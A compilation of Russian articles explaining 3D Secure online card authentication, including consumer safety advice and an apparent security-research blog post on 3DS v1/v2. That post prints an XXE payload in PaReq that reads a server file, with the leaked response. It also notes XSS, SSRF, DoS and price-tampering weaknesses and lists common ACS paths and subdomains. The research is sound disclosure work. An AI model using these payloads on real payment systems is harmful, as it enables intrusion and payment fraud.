ИНВЕСТИЦИОННЫЙ ПОРТАЛ ВОЛГОГРАДСКОЙ ОБЛАСТИ

Протокол 3D Secure не следует рассматривать как 100% гарантию сохранности средств на счете. Он всего лишь предусматривает дополнительный шаг со стороны клиента при совершении CNP-операций (card not present) — когда не предъявляется карта.

Практика показала, что разовый код может быть перехвачен мошенниками: достаточно подвергнуть устройство воздействию вируса или вредоносного программного обеспечения. Технология снижает вероятность применения фишинга, но не исключает ее полностью.

Расшифровка термина

Инструмент получил такое наименование по причине одновременной работы трех доменов сразу (отсюда и название 3-D). Первый — домен продавца и кредитной организации, в которую перечисляются деньги. Второй — домен эмитента, выпустившего банковскую карту. Третий — домен совместимости (Interoperability Domain), предоставляемый платежной системой для поддержки работы протокола безопасности 3D Secure.

Как работает 3D Secure

При совершении операции в интернете, держатель карты, поддерживающей технологию 3D Secure проходит аутентификацию в два этапа. Протокол не нужно путать с кодами безопасности CVV2 и CVC2. Использование протокола производится следующим образом:

1. Клиент завершает оформление операции, и нажимает на кнопку «Оплатить».
2. Банк высылает разовый пароль (числовой код), который вводится в форму подтверждения платежа.

Если код указывается неверно, эмитент блокирует проведение транзакции. Как правило, разовый код 3D Secure состоит из шести случайных чисел, которые генерируются отдельно по каждой операции. Протокол работает на телефонах, смартфонах, персональных компьютерах, и все остальных устройствах.

У некоторых банков действует правило, согласно которому 3-5 раз неверно введенный код приводит к автоматической блокировке банковской карты. Таким образом, эмитент исключает доступ к карте со стороны третьих лиц.

Числовой код отправляется в виде СМС-сообщения, либо другим способом. Отдельные кредитные организации используют в этих целях push-уведомления. Для совершения операции необходимо иметь при себе телефон, привязанный к карте. За отправку кода плата не взимается.

3D Secure с многоразовым паролем

По некоторым картам технология 3D Secure используется виде многоразового пароля. Его клиент получает при активации карты. Этот вариант намного экономичнее, чем отправка числового кода, но уровень безопасности при его использовании еще ниже.

По стандартной схеме мошенникам потребуется перехватить одноразовый числовой код, либо завладеть телефоном держателя карты. Намного проще получать доступ к счету, когда по всем транзакциям используется один и тот же пароль.

Достаточно узнать этот самый пароль, чтобы по карте совершать практически любые операции. В этом виде технология используется небольшими банками, продукты и услуги которых не пользуются хорошим спросом у потребителей. Причина заключается в дороговизне подключения XML-протокола.

Проблемы с безопасностью при наличии 3D Secure

Часть держателей банковских карт совершенно ошибочно полагают, что наличие технологии 3D Secure полностью исключает несанкционированный доступ к счету. Подобное заблуждение часто приводит к непоправимым последствиям.

Дело в том, что некоторые интернет-магазины и прочие торговые площадки не поддерживают данную технологию безопасности. Покупки на этих ресурсах совершаются без аутентификации клиента.

По такому сценарию любой человек, знающий номер карты, инициалы держателя, срок действия и защитный код, может сделать покупку по карте в обход разрешения со стороны законного держателя. И подобных случаев встречается масса. Наличие 3D Secure никак не влияет на такие проблемы. За год с банковских карт пропадает огромная сумма, и вопрос сохранности средств пока для банков остается открытым.

Узнать, поддерживает ли интернет-магазин технологию безопасности можно на его титульной странице. Здесь должны быть отображены логотипы Mastercard Secure Code, Verifled by VISA, МИР Accept (для пользователей из Российской Федерации). Если соответствующих обозначений на сайте интернет-магазина нет, значит, покупки здесь производятся без дополнительной аутентификации клиентов.

Что такое Liability Shift

Использование 3D Secure по карте не исключает доступ к счету со стороны третьих лиц. При утрате денежных средств кто-то должен понести ответственность. Клиенты, в первую очередь, возлагает всю вину на банк, который может применить Liability Shift — перенос ответственности. Эта процедура подразумевает, что банк может оспорить транзакцию, и вернуть деньги на счет клиента. Для этого необходимо:

• Наличие опции 3D Secure на карте.
• Отсутствие технологии в интернет магазине — когда торговая точка работает без дополнительной аутентификации клиента.

Если мерчант (торгово-сервисное предприятие) не проводит дополнительную аутентификацию покупателей, и кто-то воспользуется ворованной картой, то банк-эмитент может перенести ответственность на интернет-магазин по требованиям, которые ему (банку) предъявляет клиент.

Причина этого: банк позаботился о безопасности счетов своих клиентов, а магазин — нет. Следовательно, конечная вина может быть возложена на мерчанта. Но для этого держатель карты должен предпринять первичные действия — обратиться с требованиями о возврате суммы к банку-эмитенту, а также доказать, что операция совершена несанкционированно.

Как подключить и отключить 3D Secure на карте

3-DS в большинстве случаев подключается по умолчанию. Клиент для этого не совершает никаких действий. После активации карты технология начинает действовать в автоматическом режиме. При этом в некоторых банках подключать опцию необходимо вручную. Делается следующими способами:

• Через банкомат.
• В офисе банка.
• В интернет-банкинге.
• По телефону.

К примеру, у Сбербанка, Тинькофф Банка, Альфа-Банка и других крупных кредитных организаций технология подключена по умолчанию. Клиенту для ее активации никаких действий совершать не нужно. У Промсвязьбанка и ВТБ услуга подключается клиентом самостоятельно.

Отключение опции в ряде случаев не предусматривается. У Сбербанка ранее можно было подключать и отключать технологию безопасности в Сбербанк Онлайн. Сейчас, по современным картам, деактивация по желанию клиента не производится.

Как узнать, есть ли на карте 3D Secure

Самый простой и верный способ — изучение описания к продукту. Специалисты сервиса Brobank.ru составляют экспертные описания к банковским картам. Цель этой работы — дать пользователю полную картину о предложении, за которым он собирается обратиться в банк. Если карта оформлена после 2016 года, то технология безопасности, скорее всего, подключена по умолчанию.

Второй вариант — попытаться совершить какую-нибудь операцию в интернет-магазине, в котором используется двухэтапная аутентификация покупателей. Найти такой магазин не составит труда — крупнейшие площадки уже продолжительное время работают с повышенными мерами безопасности. После того, как подходящий магазин будет найден, необходимо совершить следующие действия:

1. Оформить к покупке любой товар.
2. Заполнить форму с реквизитами карты.
3. Перейти к оплате.

Завершать операцию покупкой товара нет необходимости. Если на телефон придет числовой код, который система предложит ввести в отдельное поле, значит, на карте полноценно работает технология безопасности 3D Secure. Если СМС-сообщение с кодом не придет, то, соответственно, опция отсутствует, либо ее нужно подключать вручную (активировать).

Анатолий Дарчиев — высшее экономическое образование по специальности «Финансы и кредит» и высшее юридическое образование по направлению «Уголовное право и криминология» в Российском Государственном Социальном Университете (РГСУ). Более 7 лет проработал в Сбербанке России и Кредит Европа Банке. Является финансовым советником крупных финансовых и консалтинговых организаций. Занимается повышением финансовой грамотности посетителей сервиса Бробанк. Аналитик и эксперт по банковской деятельности. [email protected]

ДаНет

Комментарии: 0

Что такое 3D Secure на банковской карте?

Шопинг, оплата коммунальных услуг… – расчеты в интернете давно стали неотъемлемой и очень удобной частью нашей жизни. Только, к сожалению, не всегда безопасной. Мы много рассказывали в МТБлоге о том, как обезопасить свои платежи и в большинстве случаев это зависит от внимательно и аккуратности самих держателей карт. Однако существуют технологии, которые также заботятся о безопасности ваших денег. Сегодня мы расскажем о такой технологии – 3D Secure.

Что такое 3D Secure?

Технология 3D Secure – это технология дополнительной защиты и подтверждения онлайн-платежей с помощью карты. Она была разработана для платёжной системы Visa, а со временем была принята и платёжной системой Mastercard. Со всеми платёжными системами технология работает одинаково, различаются лишь названия:

• Masterсard Secure Code
• Verified by Visa
• БЕЛКАРТ-ИнтернетПароль

Интернет-магазины и сервисы, участвующие в программе, можно узнать по наличию этих логотипов на сайте. Правда, в случае с карточками БЕЛКАРТ, это могут быть только интернет-магазины, зарегистрированные в Беларуси.

Технология 3D-Secure обеспечивает дополнительную безопасность при оплате покупок и услуг в Интернете – клиенту приходит СМС-сообщение с проверочным кодом, благодаря чему подтверждается личность плательщика. Термин «3D-Secure» (Three-Domain Secure) переводится как трех-доменная защита, имеются в виду три домена (участника):

• Банк-эмитент
• Банк-эквайер
• Платежная система

В результате проверка 3D Secure позволяет одновременно идентифицировать плательщика и сообщить ему о проведении платёжной операции. При этом, даже если платеж совершает другой человек, это становится возможным только с ведома держателя карты.

Белорусские банки, как правило, подключают 3D Secure по умолчанию ко всем картам платёжных систем Visa и Mastercard, так как международные правила платежных систем обязывают все банки предоставлять клиентам доступ к этой технологии. Если для вашей карты не предусмотрена возможность оплаты покупок в сети, то и технологии 3D Secure у нее не будет.

Как работает технология?

Когда вы совершаете оплату в интернете, у вас запрашивают данные карты – номер, срок ее действия, имя держателя карты и код CVV/CVC2. Предполагается, что эти данные есть только у владельца карты, но в реальности их может получить другой человек, достаточно внимательно рассмотреть или сфотографировать вашу карту. 3D Secure добавляет еще один подтверждающий этап в процесс оплаты, идентифицируя тем самым владельца карты – ввод уникального для каждой операции секретного кода, приходящего в виде СМС-сообщения на телефон владельца.

До появления технологии 3D Secure на сайтах интернет-магазинов нужно было вводить только данные карты – номер и код CVV/СVС2. Платежная система Visa предложила добавить ещё один секретный код, который был бы известен держателю карту, но не был написан на самой карте – так появился статичный дополнительный код, который устанавливал банк или клиент. Со временем статичный (а следовательно, тоже не очень безопасный) код был заменен на динамичный пароль, уникальной для каждой операции. Самый популярный способ доставки такого пароля клиенту – СМС-сообщение.

В зависимости от банка страница для ввода кода может выглядеть по-разному, но принцип у таких страниц всегда одинаковый. Важно помнить, что независимо от сайта, на котором вы совершаете покупку (Aliexpress, сайт БелЖД или любой интернет-магазин), для ввода проверочного кода вы будете перенаправлены на страницу вашего банка.

Кстати, убедитесь, что ваш браузер не блокирует появление всплывающих окон (при необходимости отключите в настройках эту блокировку) – иногда окно с информацией о платеже и полем для ввода кода появляется не на отдельной странице, а на всплывающем окне.

Для завершения оплаты и подтверждения операции вам необходимо ввести код. В течение нескольких минут вы получите СМС с уникальным кодом. Банк отправляет код только на тот номер телефона, который вы указывали при заключении договора и оформлении карты.

Однако, в том случае, если магазин или сервис, в котором вы собираетесь сделать покупку, не является участником программы Masterсard SecureCode / Verified by Visa, код подтверждения вам высылаться не будет. В этой ситуации ответственность за безопасность платежа ложится на магазин, по вине которого не был использован дополнительный метод защиты.

Как подключить или отключить 3D Secure?

Если вы не уверены в том, что к вашей карте подключен 3D Secure, достаточно просто позвонить в контакт-центр своего банка. Так же по звонку можно подключить услугу, если это не было сделано автоматически и если ваша карта поддерживает платежи в интернете.

Отключение может понадобиться в том случае, если вы уезжаете за границу и ваш номер телефона будет недоступен. Однако даже в этом случае нужно помнить, что банк может отказать в отключении этой технологии защиты. В случае с подключением – наоборот, отказывать банк не имеет права, так как это нарушит правила платёжных систем. Кстати, если у вас изменился номер телефона – это ещё одна причина сообщить банку новые данные, чтобы наверняка получать СМС с кодами подтверждения операций.

При подключении помните, что 3D Secure – это бесплатная технология. Независимо от банка, который выпустил карту, платёжные системы обязывают банки предоставлять технологию бесплатно.

Безопасность

Чтобы ваши деньги не стали лёгкой добычей для мошенников, старайтесь придерживаться нескольких важных рекомендаций:

• Подключите для вашей карты технологию 3D Secure (или по крайней мере не отключайте ее) и обязательно используйте одноразовые пароли.
• Никому не сообщайте коды подтверждения – известны случаи, когда злоумышленники использовали украденные данные карт и звонили владельцам с просьбой сообщить код из СМС, представляясь сотрудниками банков. Помните – вы можете использовать код только сами и только на официальной странице подтверждения оплаты.
• Не совершайте покупки на подозрительных сайтах. Гарантией того, что ваши данные передаются в защищенном виде, служит наличие у сайта SSL-протокола шифрования – адрес такого сайта всегда начинается с HTTPS.
• Ищите на сайте надпись или логотипы Verified by Visa или Masterсard SecureCode, которые являются подтверждением того, что сайт использует технологию 3D Secure.
• Установите на смартфон и компьютер программу-антивирус, чтобы уберечь свои данные.
• Никогда не сохраняйте данные карты в браузере. Даже если технология 3D Secure у вас включена, не исключено, что ваш банк использует ее не для всех транзакций.

Читайте нас в Telegram и Яндекс.Дзен первыми узнавайте о новых статьях!

3D Secure, или что скрывают механизмы безопасности онлайн-платежей / Блог компании Digital Security / Хабр

Электронная коммерция — одна из самых больших и быстро растущих областей, в связи с чем она привлекает внимание как исследователей информационной безопасности, так и злоумышленников. Поэтому хотелось бы разобраться в некоторых аспектах механизмов безопасности, применяемых при проведении онлайн-платежей.

Один из протоколов, используемых для увеличения безопасности онлайн-платежей — 3D Secure. Это протокол, который был разработан на основе XML в качестве дополнительного уровня безопасности платежей, проводящихся без физического участия карты (card not present payment). VISA создала первую версию этого протокола, но вскоре его начали использовать и другие компании (Master Card, JCB International, AmEx, Мир), впоследствии объединившиеся с VISA в содружество EMV. EMV занимается поддержкой и развитием протокола 3DS.

Почему протокол 3D Secure называется именно так?

Полное название этого протокола — Three Domain Secure.
Первый домен — домен эмитента — это банк, выпустивший используемую карту.
Второй домен — домен эквайера — это банк и продавец, которому выплачиваются деньги.
Третий домен — домен совместимости (interoperability domain) — инфраструктура, используемая при оплате картой (кредитной, дебетовой, предоплаченной или другими типами платежных карт) для поддержки протокола 3D Secure. Он включает в себя Интернет, подключаемый модуль продавца (merchant plug-in), сервер контроля доступа (access control server) и других поставщиков программного обеспечения.

Зачем это нужно?

3D Secure обеспечивает новый уровень безопасности путем предоставления дополнительной информации.
Еще одним важным моментом является «перенос ответственности». Это означает, что в случае мошенничества вся ответственность ложится на банк-эмитент. Этот момент является очень важным для продавца (мерчанта), т.к. до появления 3D Secure урегулированием спорных вопросов приходилось заниматься мерчанту.

Также не стоит забывать о двух важных психологических аспектах: повышении доверия к онлайн-платежам и увеличении конверсии.
Конверсия может быть увеличена за счет обновлений протокола 3DS, направленных на сокращение взаимодействия с пользователем.

Версии протокола 3D Secure

v1.0 - 2001 г -…
v2.0 - 2014 г - Устарело
v2.1 - 2017 г
v2.2 - 2018 г

В настоящее время большинство платежных сервисов используют версию 1.0.2 при проведении онлайн CNP-платежей, запрашивающих OTP-код.
Версия 1.0.2 была создана в 2001 году и в ней есть некоторые проблемы.

На данный момент актуальной версией является v2.2, и EMV планирует, что к концу 2020-го года она будет использоваться везде.

Это основная схема, необходимая для понимания всего процесса платежа с использованием механизма 3DS.

На этом рисунке мы видим все три домена, используемые в протоколе, а также последовательность сообщений между всеми участниками платежной операции.

Как это работает?

Главное, что необходимо понять, — это то, что при использовании своей карты (виртуальной или реальной) для онлайн-оплаты, вы сталкиваетесь именно с протоколом 3DS. Поэтому сейчас мы проиллюстрируем все этапы совершения онлайн-платежа.

1 — Покупатель уже добавил все необходимые ему товары в корзину и нажал кнопку «Оплатить». В этот момент он попадает на страницу MPI-сервиса, где вводит данные своей карты.

После нажатия кнопки оплаты продавец (MPI) инициализирует старт платежного потока и, согласно протоколу, отправляет CRReq-запрос (Card Range Request). Данный запрос необходим, чтобы найти банк-эмитент вашей карты и получить CRR из домена взаимодействия. Этот запрос нас мало интересует.

После этого MPI отправляет VeReq (Verification Request). Этот запрос отправляется банку-эмитенту для проверки того, что 3DS для данной карты включен и карту можно использовать для оплаты.

VeRes (Verification Response) содержит дополнительную информацию для следующего этапа платежа.

Клиенты не могут видеть эти два типа сообщений.

2 — MPI создает PaReq (Payment Request) — запрос на оплату. Этот запрос отправляется через редирект в браузере клиента.

Итогом отправки PaReq становится отображение запроса на ввод OTP-кода.

3 — Клиент вводит OTP-код и возвращается на сайт продавца. Опять же в процессе этого через редирект от банка-эмитента к MPI передается PaRes (Payment Response), который содержит информацию о статусе проверки.

А поподробнее?

CRReq/CRRes для нас не очень важны. А вот VeReq/VeRes рассмотреть нужно.

<?xml version="1.0" encoding="UTF-8"?>
<ThreeDSecure>
  <Message>
    <VEReq>
      <version>1.0.2</version>
      <pan>4444333322221111</pan>
      <Merchant>
        <acqBIN>411111</acqBIN>
        <merID>99000001</merID>
        <password>99000001</password>
      </Merchant>
      <Browser>
        <deviceCategory>0</deviceCategory>
        <accept>*/*</accept>
        <userAgent>curl/7.27.0</userAgent>
      </Browser>
    </VEReq>
  </Message>
</ThreeDSecure>

В VeReq самым важным параметром является идентификатор сообщения, информация о продавце и PAN карты.

<?xml version="1.0" encoding="UTF-8"?>
<ThreeDSecure>
  <Message>
    <VERes>
      <version>1.0.2</version>
      <CH>
        <enrolled>Y</enrolled>
        <acctID>A0fTY+pKUTu/6hcZWZJiAA==</acctID>
      </CH>
      <url>https://dropit.3dsecure.net:9443/PIT/ACS</url>
      <protocol>ThreeDSecure</protocol>
    </VERes>
  </Message>
</ThreeDSecure>

VeRes возвращает message id, который необходим, чтобы сопоставить запрос с этим ответом. А status enrolled показывает, что карта поддерживается.
Однако наиболее важным параметром в данном сообщении является URL-адрес. Этот параметр указывает, где находится ACS сервер эквайера и куда нужно отправить PaReq.

Pareq

Браузер клиента, совершающего оплату, может произвести достаточно много редиректов по различным компонентам, участвующим в совершении платежа. Так, в России есть некоторое количество запросов, обрабатывающихся на стороне Национальной Системы Платежных Карт. Но сегодня нас интересует только традиционный этап, описанный в спецификации протокола. А именно этап передачи PaReq.

URL: https://site.ru/acs/pareq

MD=5ebde4d3-3796-7a4d-5ebd-e4d300003dd0&PaReq=eJxVUstywjAM%2FBUm98QPDDiMcIc2dMoh0AedKb2ljiDpNAFMUgJfXzuFPnzSrjQraWW4aoqPzieafb4pRx4LqNfBUm%2FSvFyPvOfFrS%2B9KwWLzCBGT6hrgwpi3O%2BTNXbydOS96VDocEX9FePaF1IIPwlF6qeoV7Inqeyh9hTcjx9xp%2BDcSNk%2BAQdygVbR6CwpKwWJ3l1PZ0rwQZ9SIGcIBZpppAaSuse7POwC%2BeagTApUy%2FEsmrwE8Xw2WQJpKdCbuqzMUfWFLb4AqM2HyqpqOyTkcDgExabEY3BMyhSbwNRAXB7I70D3tYv2Vq%2FJUzU7Teg8ejjE7xMWn9Z8Hk35fKEtNx4BcRWQJhUqTplklIoOC4c9NuwOgLQ8JIUbRDHK2vW%2BEWxdk%2FG%2F1F8KrO%2FGnuWyywUBNls7v62wZv7EQH5nvrlzlurKGsUGNOwy0ZfhXf5udlkmV7ey98rfmnjpjG6LnGJubeKUslbSASBOhpxvSM7nt9G%2Fb%2FEFnkK9RA%3D%3D&TermUrl=https%3A%2F%shop.ru%2Fgates%2F3ds

Платежный запрос, содержащий PaReq (метод POST), имеет три параметра:
1) MD — данные продавца. Он нужен MPI, чтобы сопоставить PaReq и PaRes одной транзакции;
2) PaReq — параметр этого платежного запроса. Он содержит всю важную информацию о платеже;
3) TermUrl — URL-адрес, на который клиент будет возвращен в конце процесса аутентификации 3D Secure.

Параметры TermURL и MD всегда отражаются в ответе на данный запрос. Поэтому могут встречаться имплементации ACS, уязвимые к атакам типа reflected XSS. В процессе аудита различных систем такие сервера были найдены.

Важный момент №1: ACS сервера обрабатывают все входящие PaReq!

Что входит в параметр PaReq?
Вы можете получить его значение, раскодировав PaReq. Это сделать достаточно легко, потому что PaReq — это Xml-> zlib-> base64-> urlencode. Для упрощения работы с этими запросами был написан плагин для burp.

Теперь мы видим, что из себя на самом деле представляет PaReq, а именно сообщение формата xml. Это сообщение содержит информацию о сумме платежа (purchAmount, amount и currency), некоторую информацию о продавце и MessageId (из VeReq).

При отправке правильно сформированного PaReq (в большинстве случаев вам не нужен полный набор запросов на оплату — требуется отправить лишь PaReq, содержащий параметры правильного типа и длины), мы получим PaRes — ответ на платеж, подобный следующему:

Первая мысль, которая может прийти в голову веб-исследователю, который видит XML-запрос — это попробовать выполнить XXE. И это правильный путь!

Но для начала посмотрим на то, что случится, если отправить некорректно сформированный PaReq. Мы получим ошибку! Вот несколько примеров таких ошибок:

<ThreeDSecure><Message><Error><version>1.0.2</version><errorCode>99</errorCode><errorMessage>Permanent system failure.</errorMessage><errorDetail>Failed to build error message.</errorDetail></Error></Message></ThreeDSecure>

<errorCode>5</errorCode><errorMessage>Format of one or more elements is invalid according to the specification.</errorMessage>

<errorCode>98</errorCode><errorMessage>Transient system failure</errorMessage>

<errorCode>4</errorCode><errorMessage>Critical element not recognized</errorMessage>

Ошибка может помочь получить дополнительную информацию о версии ACS. Некоторые из них могут также оказаться полезными для получения данных из XXE.

Раскрутим XXE

Рассмотрим следующий пример:

<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE ThreeDSecure [<!ENTITY ac SYSTEM "file:///proc/sys/kernel/hostname">]><ThreeDSecure><Message id=“123-123-123-123-123-123"><PAReq><version>1.0.2</version><Merchant><acqBIN>510069</acqBIN><merID>&ac;</merID><name>MerchantName</name><country>643</country><url>http://asdas.as</url></Merchant><Purchase><xid>U3Vic2NyaWJlX0B3ZWJyMGNr</xid><date>20181004 21:34:21</date><amount>202000</amount><purchAmount>202000</purchAmount><currency>643</currency><exponent>2</exponent><desc>AcquirerName</desc></Purchase><CH><acctID>DYasdVQAOX6as3dfcxccwzPCR6Q74eS5</acctID><expiry>2209</expiry></CH></PAReq></Message></ThreeDSecure>

acqBIN, merID, xid, date, purchAmount и currency отражаются в PaRes. Однако во всех реализациях ACS, которые мы нашли, удалось использовать только merID. Остальные параметры проверяются на соответствие типам данных.

Еще один интересный параметр (и наиболее полезный для атаки) — это URL. Этот параметр не отражается, но и не проверяется. Поэтому его можно использовать для эксплуатации XXE.

Вернемся к нашему примеру. В одной из реализаций ACS мы обнаружили, что можем читать короткие файлы, а также получать ответ в PaRes error через параметр merID. Таким образом, используя PaReq из примера выше, мы получали следующий ответ:

<ThreeDSecure><Message><PARes><version>1.0.2</version><Merchant><acqBIN>510069</acqBIN>
<merID>ACS server name</merID>
</Merchant><Purchase><xid>U3Vic2NyaWJlX0B3ZWJyMGNr</xid><date>20181004 21:34:21</date><purchAmount>202000</purchAmount><currency>643</currency><exponent>2</exponent></Purchase><pan>000000000000000</pan><TX><time>20181004 21:34:21</time><status>U</status></TX><IReq><iReqCode>55</iReqCode><iReqDetail>PAReq.CH.acctID</iReqDetail></IReq></PARes></Message></ThreeDSecure>

Тем не менее в большинстве случаев оставалось только использовать параметр URL для получения DNS или HTTP-запроса к нашему сервису. Другой вектор — это выполнить DOS через XXE-атаку «billion laughs» (проверялось на тестовом сервере).

Где это можно найти?

В ходе нашего исследования мы обнаружили несколько распространенных URL-адресов:

/acs/pareq/___uid___
/acspage/cap?RID=14&VAA=B
/way4acs/pa?id=____id____
/PaReqVISA.jsp
/PaReqMC.jsp
/mdpayacs/pareq
/acs/auth/start.do

И распространенные имена поддоменов:

acs
3ds
3ds
secure
cap
payments
ecm
3dsauth
testacs
card

Впрочем, иногда вы можете найти и другие интересные пути.
Если вы хотите найти что-то новое, используйте proxy interceptor и записывайте процесс совершения платежей для интересующей вас платежной системы.

3D Secure v 2. *

Как мы писали ранее, в 3DS v1.0 есть некоторые проблемы.

Основная проблема в том, что покупатель может использовать множество разных типов устройств. Планшет, мобильный телефон, умные часы, умный чайник и т.д. Но сайт ACS не всегда разработан для взаимодействия со всеми типами устройств.

Для этого в 3DS 2.0 предусмотрели 3DS SDK.

Другая проблема состоит в том, что новый тип защиты требует дополнительного взаимодействия с клиентом. И этот момент влияет на конверсию. Решением проблемы конверсии стала возможность использования механизма управления рисками, который позволяет не заставлять пользователя вводить дополнительные секретные данные, если банк обладает достаточным количеством информации, подтверждающей личность клиента.

Следующий важный момент заключается в том, что технологии аутентификации развиваются. Соответственно, 3DS могла бы использовать не только OTP. Поэтому v2 задумывалась с возможностью расширения поддержки различных механизмов аутентификации.

Интересный факт про v1.0. Люди некоторых стран не доверяли этому протоколу, потому что видели редирект и думали, что это мошенничество!

Этот психологический момент послужил причиной изменения спецификации второй версии протокола для сокрытия момента перенаправления.

Как работает 3D Secure v2?

Начало потока платежей аналогично предыдущей версии. Клиент должен указать данные своей карты.

Первый и самый важный момент — это Risk Engine. В версии 1.0.2 клиенты всегда должны вводить второй фактор, например OTP. Однако в версии 2. * клиент может никогда не увидеть этот дополнительный защищенный запрос.

Особенности работы v2

Если вы посмотрите на схему потока платежей, вы увидите, что она похожа на предыдущую, но во 2-й версии больше этапов. Это происходит за счет добавления дополнительных аутентификационных запросов и механизма Risck Engine, который может совершать как один дополнительный запрос (при платеже через браузер), так и множество (используется 3DS SDK).

Условно, 2-ю версию можно разделить на два блока. Красный, где пользователь непосредственно влияет на передаваемую информацию, и желтый, где система сама собирает и передает информацию о пользователе.

А поподробнее?

AReq (base64url) расскажет все о вас и об устройстве, с которого совершена покупка.
Если вы задумаетесь о том, какой информацией о вас располагают рекламные агентства, то данные AReq вас не удивят. Но если вам кажется, что это плохо, рассмотрите следующий момент: банки знают все о ваших покупках и о вас. С этой точки зрения, некоторая дополнительная информация не так уж и плоха)

Это сообщение необходимо для работы системы управления рисками и упрощения покупок.
Если этой информации оказалось недостаточно, Risk Engine сперва попытается получить дополнительную информацию, и именно в этот момент клиент может получить OTP-запрос.

Что контролирует пользователь?

CReq (base64url json) — challenge request — сообщение, отправляемое браузером пользователя, в случае если ARes вернет сообщение о необходимости провести Challenge Flow.

{
"ThreeDSServerTransID": "8a880dc0-d2d2-4067-bcb1-b08d1690b26e",
"AcsTransID": "d7c1ee99-9478-44a6-b1f2-391e29c6b340",
"MessageType": "CReq",
"MessageVersion": "2.1.0",
"SdkTransID": "b2385523-a66c-4907-ac3c-91848e8c0067",
"SdkCounterStoA": "001"
}

Если платежный процесс использует 3D Secure SDK, это сообщение будет зашифровано (JWE).

В CReq вы можете увидеть следующие поля:

К сожалению, нам пока не удалось провести достаточно подробное исследование 2-й версии протокола 3DS, поэтому сложно сказать, какие уязвимости встречаются чаще. Вы можете стать первым, кто опубликует исследование на данную тему.

Проблемы (найденные и возможные)

На что смотреть в v1

• XXE в параметре Pareq:
  
  • DOS
  • чтение файла
  • ssrf
• XSS в параметрах TermUrl
• Blind XSS — все параметры и заголовки попадают в систему мониторинга
• Pareq не подписан, но в нем есть цена! Отсюда может последовать атака уже на магазин, т.к. если на стороне магазина не будет проверки суммы подтвержденной операции, то вы сможете совершить покупку вещи стоимостью в 100р за 1р.

На что смотреть в v2

• Blind XSS — все параметры и заголовки попадают в систему мониторинга
• Challenge flow, главное его поймать…

Тем, кто подумывает обратить свой взгляд на платежные системы, я бы посоветовал остановиться еще и на сервисах, предоставляющих 3DS как SaaS. Там может оказаться еще достаточно много вещей, которые помогут вам понять, как устроен мир онлайн-платежей.

https://github.com/w3c/webpayments/wiki
https://www.EMV.com/emv-technologies/3d-secure/
https://3dsserver.netcetera.com/3dsserver-saas/doc/current/schema/3ds-api.html
https://github.com/webr0ck/3D-Secure-audit-cheatsheet

P.S. Возможно, вам пришел в голову вопрос: «Я пользовался AliExpress, Amazon, другое, и мне не приходил OTP код. Здесь использовался 3DS?» Нет, не использовался. Это как раз примеры тех случаев, когда магазин берет на себя ответственность за мошеннические операции.

Что такое технология 3D-Secure на картах

Оплата картой через Интернет – это очень удобный инструмент, но до массового внедрения 3D-Secure он был очень опасным. Посудите сами, при оплате через Интернет никто не видит, кто сейчас вводит данные, а значит не может быть уверен, что картой пользуется ее владелец. Технология 3D-Secure – это лучший инструмент для защиты ваших денег на карте при оплате онлайн. Благодаря этой технологии банк удостоверяется, что платеж проводит владелец карты.

Что такое технология 3D-Secure

3D-Secure – это технология защиты онлайн платежей при помощи карты. Технологию разработала компания Visa, но чуть позже ее переняли все крупные игроки. Смысл технологий у каждой платежной системы единый, отличается лишь название и наравне с 3D-Secure употребляются следующие термины:

• Verified by Visa;
• MasterCard Secure Code;

Свое решение есть и у японской JCB International, они называют технологию –  J/Secure. В России распространены три платежные системы – Visa, MasterCard и российская система МИР. Отечественные карты также поддерживают технологию, ей дали название MirAccept. Но как бы ни называлась технология у каждой платежной системы, в России больше распространен термин 3D-Secure. И это справедливо, так как даже российская разработка – MirAccept, полностью построена на 3D-Secure.

Технология 3D-Secure является XML-протоколом и отвечает за безопасную оплату в сети Интернет. Для подтверждения личности клиенту на телефон приходит обычная SMS с проверочным кодом. Но это лишь верхушка айсберга. У платежных систем и банков существует не так много способов, как они могут проверить, кто пользуется картой для оплаты. Сам термин «3D-Secure» переводится как трех доменная защита, и не имеет ничего общего к трехмерному измерению. 3D = 3 Domains. В данном случае участвует 3 домена:

• Банк-эмитент;
• Банк-эквайер;
• Платежная система;

3D-Secure является гениальным решением, так как проверка позволяет одновременно оповестить владельца о готовящейся оплате и идентифицировать его. Этот процесс называется аутентификация. В результате платежная система проверяет, кто совершает оплату, тем самым повышается уровень безопасности платежных карт. При этом платеж может совершить и другой человек, но с явного ведома владельца карты.

Читайте также:  Бесплатная дебетовая карта

Как работает технология

Когда вы оплачиваете покупки в Интернете, то от вас запрашивают целый ряд данных вашей карты. Предполагается, что эти данные есть только у владельца карты, но их легко потерять, ведь все они написаны на самой карте. 3D-Secure добавляет еще одно действие в процесс оплаты, тем самым технология позволяет идентифицировать владельца.

Если технология 3D-Secure на карте включена, то между вводом данных карты и фактической оплатой появляется еще один шаг. Владельцу карты необходимо ввести секретный код. Этот код может быть, как постоянным, так и одноразовым. Постоянный код менее надежен, так как его также можно утратить, например, при оплате на компьютере, который заражен вирусом. В России больше распространены одноразовые коды, приходящие на телефон. В Европе и США доступен вариант с токенами – специальные устройства, генерирующие уникальный единственно верный ответ для любой транзакции.

Страница для ввода кода может быть различной — это зависит от вашего банка. Но вы должны помнить, даже если вы оплачивали через интерфейс стороннего сайта, например, на Ebay, Aliexpress или сайте РЖД, то для ввода проверочного кода вы будете перенаправлены на страницу вашего банка. Пример:

Для завершения оплаты вам необходимо ввести код. Если у вас 3D-Secure работает через SMS на телефон, то в течение нескольких минут вы получите проверочный код. Альфа-банк отправляет подобные коды:

Банк отправляет код только на тот телефон, который указан в договоре между владельцем карты и банком. Это позволяет идентифицировать, что платеж был инициирован владельцем. После ввода кода платеж обрабатывается и деньги списываются, если на карте имеется достаточная сумма.

На каких картах есть 3D-Secure

В России банки, как правило, подключают 3D-Secure автоматически ко всем картам, поддерживающим платежи в сети Интернет. Если ваша карта не позволяет оплатить покупку в сети и эта функция не может быть включена, то и технологии 3D-Secure у нее нет. Это объясняется просто, технология не имеет смысла для карт, где нет возможности совершить платеж в Интернете. Неполный список банков, поддерживающих 3D-Secure:

• Сбербанк;
• Альфа Банк;
• Тинькофф;
• Русский Стандарт;
• Почта банк;
• ВТБ;
• Бинбанк;
• Восточный;

Читайте также:  Доходная карта Капитал Россельхозбанка

Международные правила платежных систем обязывают все банки предоставлять клиентам доступ к технологии 3D-Secure. Но вопрос – включена ли она у вас, это другой вопрос, нежели, есть ли эта технология в банке.

